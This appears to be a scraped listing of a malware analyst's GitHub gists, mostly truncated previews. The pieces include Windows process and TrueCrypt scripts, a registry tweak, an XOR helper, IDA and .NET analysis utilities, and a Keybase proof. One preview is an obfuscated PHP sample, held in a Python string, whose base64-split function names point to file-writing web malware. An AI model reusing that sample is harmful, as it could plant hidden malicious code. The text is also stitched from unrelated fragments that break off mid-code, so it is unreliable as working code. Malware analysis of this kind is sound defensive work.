# Based on WMI code from http://mail.python.org/pipermail/python-win32/2006-March/004340.html | |
import os | |
def process_running(procname): | |
def find_pid(processname): | |
import win32com.client | |
for proc in win32com.client.GetObject('winmgmts:').InstancesOf('win32_process'): | |
if proc.Name.upper() == processname.upper(): | |
return proc.Properties_('ProcessId') | |
import os | |
import subprocess | |
tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe" | |
tc_file = "E:\\test.tlc" | |
drive_letter = "P" | |
def leet_lookup(char): | |
list = {"a": ["a","A","@"], | |
"b": ["b", "B", "8"], |
import os | |
import sys | |
from PyQt4.QtCore import * | |
from PyQt4.QtGui import * | |
import base64 | |
def main(): | |
app = QApplication(sys.argv) | |
w = MyWindow() | |
w.show() |
import base64 | |
script = """ | |
<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' |
#@bbaskin | |
import os | |
import re | |
# Thanks to Andrew Havens of Cipher Tech for figuring out how to escape the parentheses to work with | |
# both expandvars and regex | |
def generalize_vars_init(): | |
""" | |
Initialize a dictionary with the local system's environment variables. |
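def multibyte_xor(data, key):
    """Return *data* XOR-ed against *key*, with *key* repeated to cover *data*.

    XOR is its own inverse, so applying the same key twice restores the
    original input.  Runs on Python 2 and 3: the original relied on
    ``itertools.izip``, which does not exist on Python 3.

    Args:
        data: a ``str`` (either Python version) or, on Python 3, ``bytes``.
        key: the repeating key, same kind of value as *data*; must be
            non-empty.

    Returns:
        A value of the same type and length as *data*.

    Raises:
        ValueError: if *key* is empty.  The original returned ``''`` in
            that case, silently discarding *data*.
    """
    from itertools import cycle
    try:
        from itertools import izip as lazy_zip  # Python 2: builtin zip is eager
    except ImportError:
        lazy_zip = zip  # Python 3: builtin zip is already lazy

    if not key:
        raise ValueError("key must be non-empty")

    # lazy_zip stops when data is exhausted, so the infinite cycle(key) is safe.
    if isinstance(data, bytes) and not isinstance(data, str):
        # Python 3 bytes iterate as ints, so ord()/chr() must be skipped.
        # (On Python 2 bytes is str, so this branch is never taken there.)
        key_ints = key if isinstance(key, bytes) else [ord(c) for c in key]
        return bytes(d ^ k for d, k in lazy_zip(data, cycle(key_ints)))
    return ''.join(chr(ord(x) ^ ord(y)) for x, y in lazy_zip(data, cycle(key)))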
Windows Registry Editor Version 5.00 | |
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\Command Prompt Here\command] | |
@="cmd.exe /k cd \"%L\"" | |
# Automatically find XOR/SHL/SHR routines from an executable | |
# Uses IDAW (text IDA) | |
# @bbaskin - brian @ thebaskins.com | |
# While other, more powerful scripts like FindCrypt find known | |
# algorithms, this one is used to find custom encoding or modified | |
# encryption routines. | |
""" | |
Script results: | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |
def get_NET_version(data): | |
""" | |
Code to extract .NET compiled version. | |
typedef struct t_MetaData_Header { | |
DWORD Signature; // BSJB | |
WORD MajorVersion; | |
WORD MinorVersion; | |
DWORD Unknown1; | |
DWORD VersionSize; | |
PBYTE VersionString; |
### Keybase proof | |
I hereby claim: | |
* I am Rurik on github. | |
* I am bbaskin (https://keybase.io/bbaskin) on keybase. | |
* I have a public key whose fingerprint is AFD8 C071 A2CE E394 D226 4F19 8732 1B4E 326D FD20 | |
To claim this, I am signing this object: |